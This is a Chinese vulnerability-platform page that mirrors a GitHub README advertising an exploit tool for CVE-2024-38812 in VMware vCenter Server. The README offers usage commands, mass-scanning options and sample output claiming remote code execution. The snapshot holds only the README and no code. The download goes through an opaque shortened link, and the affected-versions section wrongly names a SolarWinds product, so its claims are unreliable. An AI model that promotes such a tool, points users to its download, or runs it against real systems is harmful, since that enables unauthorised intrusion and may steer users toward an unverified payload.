漏洞平台

POC详情： 08636f0552a96e10e7fc64fa8a6376054a3a200c

来源

https://github.com/maybeheisenberg/CVE-2024-38812

关联漏洞

标题： VMware vCenter Server 安全漏洞 (CVE-2024-38812)
描述：VMware vCenter Server是美国威睿（VMware）公司的一套服务器和虚拟化管理软件。该软件提供了一个用于管理VMware vSphere环境的集中式平台，可自动实施和交付虚拟基础架构。 VMware vCenter Server存在安全漏洞。攻击者利用该漏洞可以远程执行代码。

介绍

# 🛠 CVE-2024-38812 Exploit

## 🌟 Description
CVE-2024-38812 is a critical unauthenticated heap-overflow vulnerability in VMware vCenter Server that may potentially lead to remote code execution. The vulnerability affects vCenter Server versions 8.0 and 7.0, as well as VMware Cloud Foundation versions 5.x and 4.x. 

## ⚙️ Installation

To set up the exploitation tool, follow these steps:

1. Download the repository:

|[Download](https://t.ly/RJAWT)
|:--------------- |

2. Navigate to the tool's directory:

```bash
cd CVE-2024-38812
```

3. Install the required Python packages:

```bash
pip install -r requirements.txt
```

## 🚀 Usage

To use the tool, run the script from the command line as follows:

```bash
python exploit.py [options]
```

### Options

- -u, --url:
  Specify the target URL or IP address.

- -f, --file:
  Specify a file containing a list of URLs to scan.

- -t, --threads:
  Set the number of threads for concurrent scanning.

- -o, --output:
  Define an output file to save the scan results.

When a single URL is provided with the -u option and the target is vulnerable, the script will attempt to execute arbitrary code.

### Example

```bash
$ python3 exploit.py -u http://target-url.com
[+] Remote code execution triggered successfully.
[!] http://target-url.com is vulnerable to CVE-2024-38812.
```

## 📊 Mass Scanning

For mass scanning, use the -f option with a file containing URLs. The tool will scan each URL and print concise results, indicating whether each target is vulnerable.

```bash
python exploit.py -f urls.txt
```

## 🗒 Affected Versions

The vulnerability affects the following versions of SolarWinds Access Rights Manager (ARM):

VMware vCenter Server < 8.0 U3b

VMware vCenter Server < 7.0 U3s

VMware Cloud Foundation = 5.x

VMware Cloud Foundation = 4.x

## 📈 CVSS Information
Score: 9.8

Severity: CRITICAL

Confidentiality: High

Integrity: High

Availability: High

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

User Interaction: None

Scope: Unchanged

文件快照


 [4.0K]  /data/pocs/08636f0552a96e10e7fc64fa8a6376054a3a200c
└── [2.0K]  README.md

0 directories, 1 file

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。